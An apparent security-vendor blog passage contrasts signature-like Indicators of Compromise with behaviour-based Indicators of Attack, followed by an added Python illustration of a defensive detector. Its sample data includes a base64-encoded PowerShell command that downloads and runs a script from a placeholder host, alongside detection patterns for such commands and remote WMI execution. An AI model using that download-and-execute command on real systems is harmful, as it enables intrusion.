Moving beyond Indicators of Compromise (IOCs)

For the last few years, the security industry has become very enamored with Indicators of Compromise (IOCs) as a way to detect targeted intrusions and adversaries that are flying right past traditional security solutions. There are now numerous vendors who are building products which scan and search for IOCs, enable sharing of IOCs or blocking of IOCs. Old style signature-based solutions (read: AV) are failing to stop advanced attacks, as the argument goes, so you need a new approach of scanning for IOCs instead of relying on file signatures that can't detect previously unknown malware threats. That sounds great right up until the moment you stop and think for a second about what an Indicator of Compromise actually is - it can be an IP address or domain name/URL, file hash, filename, registry key entry, byte sequence, and so on - you get the point. Now ask yourself what a signature that an AV-style solution may look for is - it will be a file hash, byte sequence, filename, registry key... does that start to look familiar? In fact, IOCs are nothing more than rebranded signatures that still rely on you knowing what a threat is going to look like in order to be able to detect it!

If you don't have the precise intelligence on the indicators that an attacker may use against you, or if they decide to switch to previously unknown malware, C2 servers and exploits for an attack on your organization, you are fresh out of luck and will never have a chance to detect and stop them. If an adversary engages in a malware-free intrusion, where they've acquired legitimate access to the network with stolen credentials and are roaming around using standard Windows administrative tools such as WMI and 'net use', or use base64-encoded command lines with PowerShell scripts, there are almost no IOCs for you to scan for in an attempt to identify such intrusions. In fact, this is largely why we are seeing a significant shift towards this very type of modus operandi by Chinese adversaries over the last year - DEEP PANDA and HURRICANE PANDA are two of the China-based adversaries that focus on industrial and intellectual property cyberespionage and who have adopted these tactics in their recent operations.

That is why at CrowdStrike we believe that an IOC-based detection approach is a fundamentally flawed solution to the problem of stopping a sophisticated adversary who is going to go through sufficient effort to employ stealthy techniques to fly under the radar of your IOC-based scanner. Three years ago we pioneered a new approach, which we call Indicators of Attack (IOA)
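As an added illustration of the contrast drawn above (example code written for this edit, not CrowdStrike's own tooling): an IOC scan over constructed process-creation events matches nothing, because the intrusion uses only legitimate Windows binaries, while a few behavioural checks in the spirit of IOAs flag the encoded PowerShell download, the Office-spawned shell, the 'net use' to an administrative share and the remote WMI process creation. The event fields, placeholder hashes and detection rules are assumptions, not CrowdStrike's.

```python
import base64
import re

# Constructed sample process-creation events, not taken from the original article.
# Hashes are placeholders; every image is a legitimate, built-in Windows binary.
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16le")).decode()
EVENTS = [
    {"image": "powershell.exe", "parent": "winword.exe", "sha256": "placeholder-hash-1",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"image": "net.exe", "parent": "cmd.exe", "sha256": "placeholder-hash-2",
     "cmdline": r"net use \\fileserver\C$ /user:corp\admin"},
    {"image": "wmic.exe", "parent": "cmd.exe", "sha256": "placeholder-hash-3",
     "cmdline": "wmic /node:host2 process call create cmd.exe"},
    {"image": "notepad.exe", "parent": "explorer.exe", "sha256": "placeholder-hash-4",
     "cmdline": "notepad.exe report.txt"},
]

# IOC-style check: a list of known-bad file hashes. Nothing above matches, because
# the intrusion uses only built-in tools, so an IOC scan reports a clean host.
KNOWN_BAD_HASHES = {"placeholder-known-bad-hash"}

def ioc_scan(events):
    return [e for e in events if e["sha256"] in KNOWN_BAD_HASHES]

def decode_encoded_powershell(cmdline):
    # Return the script behind -e/-enc/-EncodedCommand, or None if absent or malformed.
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def behaviour_alerts(event):
    # IOA-style check: flag what the process does, not which file it is.
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    alerts = []
    decoded = decode_encoded_powershell(cmd)
    if decoded and re.search(r"\b(IEX|Invoke-Expression|DownloadString)\b", decoded, re.I):
        alerts.append("encoded PowerShell that downloads and runs code")
    if parent in {"winword.exe", "excel.exe", "outlook.exe"} and image in {"powershell.exe", "cmd.exe"}:
        alerts.append("Office application spawning a shell")
    if image == "net.exe" and re.search(r"\\\\[^\\]+\\[A-Za-z]\$", cmd):
        alerts.append("net use to an administrative share")
    if image == "wmic.exe" and re.search(r"/node:\S+.*process\s+call\s+create", cmd, re.I):
        alerts.append("remote process creation via WMI")
    return alerts

def ioa_scan(events):
    return {e["image"]: a for e in events if (a := behaviour_alerts(e))}
```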